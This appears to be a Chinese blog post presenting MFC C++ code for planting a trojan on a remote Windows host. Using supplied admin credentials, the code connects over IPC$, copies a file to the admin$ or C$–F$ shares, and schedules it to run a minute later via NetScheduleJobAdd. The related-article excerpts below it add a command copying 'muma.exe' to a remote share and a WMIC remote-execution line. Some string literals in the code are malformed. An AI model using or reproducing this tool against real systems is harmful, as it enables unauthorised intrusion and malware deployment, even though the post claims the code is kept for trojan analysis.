要实现代码例如以下:

/////////////////////////////////////////////////////////////////////////////////////

typedef struct TagHost

{

CString host;

CString user;

CString pass;

CString filename;

CString LocalFilePath;

CListBox* list;

}IPC;

void CShareDlg::OnStart() //启动线程序

{

  UpdateData(TRUE);

  IPC* ipc = new IPC;

  ipc->host = m_host;

  ipc->user = m_user;

  ipc->pass = m_pass;

  ipc->LocalFilePath = m_localfile;

  ipc->filename = filename;

  ipc->list = &m_list;

  AfxBeginThread(ThreadIpcConnect,ipc);

}

/////////////////////////////线程/////////////////////////////////////////////////////

UINT ThreadIpcConnect(LPVOID lpvoid)

{

  IPC* ipc;

  CListBox* list;

  ipc = (IPC*)lpvoid;

  CString host;

  CString admin;

  CString pass;

  CString filename;

  CString localfilepath;

  host = ipc->host ;

  pass = ipc->pass;

  admin = ipc->user;

  localfilepath = ipc->LocalFilePath;

  filename =ipc->filename ;

list = ipc->list;

  BOOL IpcConnect;

  LPTIME_OF_DAY_INFO TimeBuf=NULL;

  NET_API_STATUS Status;

  CString RemoteFilePath,CmdCom("admin$\");

///////////////////////////////IPC连接////////////////////////////////////////////////////////////////

  NETRESOURCE ns;

  TCHAR buf[MAX_PATH];

  wsprintf(buf,"\\%s\ipc$",host);

  ZeroMemory(&ns,sizeof(ns));

  ns.dwScope=RESOURCE_GLOBALNET;

  ns.dwType=RESOURCETYPE_ANY;

  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;

  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;

  ns.lpLocalName="";

  ns.lpRemoteName=buf;

  ns.lpProvider=NULL;

  ns.lpComment=NULL;

  CString hhost = host;

  IpcConnect =WNetAddConnection2(&ns,pass,admin,0);

///建立IPC连接

  if(IpcConnect)

  {

//连接成功后

///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////

    RemoteFilePath=("\\"+host+"\admin$\"+filename);

    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制

      if(!IpcConnect)

        {

          RemoteFilePath=("\\"+host+"\C$\"+filename);

          CmdCom="C:\"+filename;

          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

            if(!IpcConnect)

            {

               RemoteFilePath=("\\"+host+"\D$\"+filename);

               CmdCom="D:\"+filename;

               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

           if(!IpcConnect)

                  {

                     RemoteFilePath=("\\"+host+"\E$\"+filename);

                     CmdCom="E:\"+filename;

                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

                     if(!IpcConnect)

                       {

                        RemoteFilePath ("\\"+host+"\F$\"+filename);

                        CmdCom = "F:\"+filename;

                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);

                       }

                  }

              }

         }

///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////

         if(IpcConnect)

         {//获取远程主机时间

           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);

            if(Status==NERR_Success)

            {//活取时间成功

///////////////////////////启动目标文件///////////////////////////////////////////////////////////////

              DWORD day=1,JobTime;

              AT_INFO ai;

              day=day*2;

              ai.Command=CmdCom.AllocSysString();

              ai.DaysOfMonth=day;

              ai.DaysOfWeek=0;

              ai.Flags=JOB_NONINTERACTIVE;

              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;

              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);

              //启动上传的文件,一分钟后启动

              if(Status==NERR_Success)

              {

                list->AddString(host+"启动成功");

              }

              else

                list->AddString(host+"启动失败");

              }

          else

            {

             list->AddString(host+"获取时间失败");

            }

         }

         else

         {

          list->AddString(host+"拷贝文件失败");

         }

    }

    else

    list->AddString(host+"连接失败");

return TRUE;

}

 

代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

远程IPC种植木马的更多相关文章

  1. IPC$横向渗透代码实现

    思路 IPC$横向渗透的方法,也是病毒常用的扩散方法. 1.建立连接 2.复制文件到共享中C$.D$.E$.F$ 3.获取服务器的时间 3.设定计划任务按时间执行 用到的Windows API 建立网 ...

  2. 一个DDOS木马后门病毒的分析

    http://blog.csdn.net/qq1084283172/article/details/49305827 一.样本信息 文件名称:803c617e665ff7e0318386e24df63 ...

  3. 内网IPC$种马的三种方法

    copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:adminis ...

  4. 使用shutdown命令实现局域网内远程关机、重启整蛊他人

    用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\compu ...

  5. 域渗透:IPC$ 命名管道

    介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接 ...

  6. linux端口详解

    Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 ...

  7. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  8. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  9. port与大全portClose方法

    在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义p ...

随机推荐

  1. EM算法与混合高斯模型

    非常早就想看看EM算法,这个算法在HMM(隐马尔科夫模型)得到非常好的应用.这个算法公式太多就手写了这部分主体部分. 好的參考博客:最大似然预计到EM,讲了详细样例通熟易懂. JerryLead博客非 ...

  2. 无线通信中FEC 编码原理及评价

    转自:http://blog.csdn.net/wiznet2012/article/details/7492146 大家好,前面我们给大家介绍了无线通信中FEC编码原理(1)和(2),今天继续献上F ...

  3. 手游项目Crash的上报

    基于cocos2d-x开发的手游,免不了会遇到崩溃.闪退,在非debug状态下定位问题异常的艰难,像我们项目是在cocos2dx的基础上封装了一层,然后又与lua进行互调.因为接受C++/移动端开发比 ...

  4. 用开源项目circular progress button实现有进度条的Button

    circular progress button可以让button实现进度条,效果和动画都做的很赞,只是有点小bug.需要注意的是按钮上的文字不能太大,否则会出现错位. 项目的地址:https://g ...

  5. Java中的线程实现

    线程实现有两种方法: 1.写一个类来继承Thread类,然后复写run()方法. public class HelloThread extends Thread { public void run() ...

  6. python-opencv旋转图像,保持图像不被裁减

    python-opencv旋转图像,保持图像不被裁减   import cv2 from math import * def remote(img,degree): #degree左转 img = c ...

  7. django的日志发往http server

    配置示例: # https://docs.djangoproject.com/zh-hans/2.1/topics/logging/ LOGGING = { , 'disable_existing_l ...

  8. JQuery的ajaxFileUpload的使用

    https://www.cnblogs.com/zhanghaoliang/p/6513964.html 最近在工作中使用了Jquery的ajaxFileUpload的图片上传插件,感觉这种异步上传的 ...

  9. 使用C++ Builder XE5获取Sensor值之Light Sensor

    献上代码C++代码,仅供參考. 若使用Delphi.请參考文献,http://blogs.embarcadero.com/davidi/2013/12/02/43032/ 一定记得要安装FireMon ...

  10. 网关局域网通信协议V2.0

    http://docs.opencloud.aqara.cn/development/gateway-LAN-communication/ https://github.com/aqara/openc ...